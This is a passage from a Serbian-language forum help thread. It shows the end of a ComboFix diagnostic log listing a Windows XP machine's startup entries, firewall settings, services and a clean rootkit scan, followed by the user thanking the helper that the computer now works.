[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" [2007-01-15 17:14 147456]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-04 03:07 15360]
"MsnMsgr"="C:\Program Files\Windows Live\Messenger\MsnMsgr.exe" [2007-10-18 11:35 5724184]
"Yahoo! Pager"="C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.exe" [2007-08-30 17:43 4670704]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMAXPnP"="C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe" [2004-10-14 10:11 1388544]
"NeroFilterCheck"="C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe" [2006-01-12 16:40 155648]
"TkBellExe"="C:\Program Files\Common Files\Real\Update_OB\realsched.exe" [2002-01-07 11:13 180269]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe" [2008-02-22 04:25 144784]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 10:06 88363 C:\WINDOWS\AGRSMMSG.exe]
"WinampAgent"="C:\Program Files\Winamp\winampa.exe" [2007-10-10 07:28 36352]
"QuickTime Task"="C:\Program Files\QuickTime\QTTask.exe" [2008-01-31 23:13 385024]
"egui"="C:\Program Files\ESET\ESET Smart Security\egui.exe" [2008-03-13 16:48 1443072]

C:\Documents and Settings\n\Start Menu\Programs\Startup\
LimeWire On Startup.lnk - C:\Program Files\LimeWire\LimeWire.exe [2008-04-18 21:21:09 147456]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe [2006-10-23 02:48:20 40048]
Adobe Reader Synchronizer.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe [2006-10-23 01:01:50 734872]
AudioDeck.lnk - C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe [2002-03-18 11:13:06 581632]
Remote Controller.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE [2002-03-18 11:37:43 102400]
Scheduler.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE [2002-03-18 11:37:43 118784]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"VIDC.AP41"= APmpg4v1.dll
"vidc.DIV3"= DivXc32.dll
"msacm.divxa32"= DivXa32.acm
"vidc.DIV4"= DivXc32f.dll
"VIDC.ACDV"= ACDV.dll
"VIDC.XFR1"= xfcodec.dll

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PowerS]
--a------ 2001-08-03 18:56 159800 C:\WINDOWS\PowerS.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RaidTool]
--------- 2004-10-11 08:54 589824 C:\Program Files\VIA\RAID\raid_tool.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
--a------ 2007-08-30 17:43 4670704 C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"WZCSVC"=2 (0x2)
"SSDPSRV"=3 (0x3)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"C:\\Program Files\\eMule\\emule.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YServer.exe"=
"C:\\Program Files\\LimeWire\\LimeWire.exe"=
"C:\\Program Files\\Evil Msn\\Evil Msn 3.0.exe"=
"C:\\Program Files\\BearShare Applications\\BearShare\\BearShare.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
"C:\\Program Files\\Xfire\\xfire.exe"=

R0 videX32;videX32;C:\WINDOWS\system32\DRIVERS\videX32.sys [2006-02-23 12:38]
R2 BT878;BtCap, WDM Video Capture;C:\WINDOWS\system32\drivers\BT878.SYS [2004-04-07 22:30]
R2 BTTUNER;BtTuner, WDM TV Tuner;C:\WINDOWS\system32\drivers\BTTUNER.SYS [2004-04-07 22:30]
R2 BTXBAR;BtXBar, WDM Crossbar;C:\WINDOWS\system32\drivers\BTXBAR.SYS [2004-04-07 22:30]
R3 usnjsvc;Usluga Messenger Sharing Folders USN Journal Reader;"C:\Program Files\Windows Live\Messenger\usnsvc.exe" [2007-10-18 11:31]
S3 CV2K1;CommView Network Monitor;C:\WINDOWS\system32\DRIVERS\cv2k1.sys []
S3 Vsp;Vsp;C:\WINDOWS\system32\drivers\Vsp.sys [2003-05-27 17:45]

.
Contents of the 'Scheduled Tasks' folder
"2008-04-07 15:45:53 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
"2008-03-11 17:00:00 C:\WINDOWS\Tasks\Pareto UNS.job"
- C:\Program Files\Common Files\ParetoLogic\UUS\UUS.dll\Pareto_Update.exe
.
**************************************************************************

catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-06-03 17:46:07
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
Completion time: 2008-06-03 17:47:30
ComboFix-quarantined-files.txt  2008-06-03 15:47:23
ComboFix2.txt  2008-06-03 12:05:43
ComboFix3.txt  2008-06-02 19:53:06

Pre-Run: 29,154,091,008 bytes free
Post-Run: 29,144,064,000 bytes free

180   --- E O F ---   2008-05-16 20:47:53


e brate hvala ti mnogo evo komp radi perfektno

Poslao: 03 Jun 2008 19:17
Idi na vrh
offline
  • dr_Bora  Male
  • Anti Malware Fighter
    Rank 2
  • Pridružio: 24 Jul 2007
  • Poruke: 12280
  • Gde živiš: Höganäs, SE

MyCity » Ambulanta -> Arhiva Ambulante » virus!

Ko je trenutno na forumu
 

Ukupno su 1040 korisnika na forumu :: 64 registrovanih, 6 sakrivenih i 970 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 15694 - dana 01 Feb 2026 12:23

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: Abebe Bikila, airliners, aleph_one, anta, babaroga, bbrasnjo3, Bo96, bojcistv, Bubimir, cuvarkuca, CVOJ 410.lad PVO, Deki Duga Devetka, desmeki, dragan_mig31, draganl, Dragmi mi, DrFlyFisherman, dule10savic, Džekson, eagle.rs, El-Komadante, Ercomero, flash12, GH69, gost321, HogarStrashni, hyla, Ir, Kajzer Soze, Kamov, king011, Lance Guest, Laske, ljubo70, ludiagresivan, Luka Blažević, mercedesamg, mile.ilic75, nekdo, nikolapetkovic, niksa517, Pero Petković, Petarvu, PlayerOne, raso76, raster12, Rogan33, Rothmans, sale755, Semberija, Sevetar, sistem22, slowhand, tanakadzo, tomo2, TRAVUNIJA, TRZH92, vathra, vidra1, Vlada1389, Vzor50, zlaya011, zokizemun, zvomar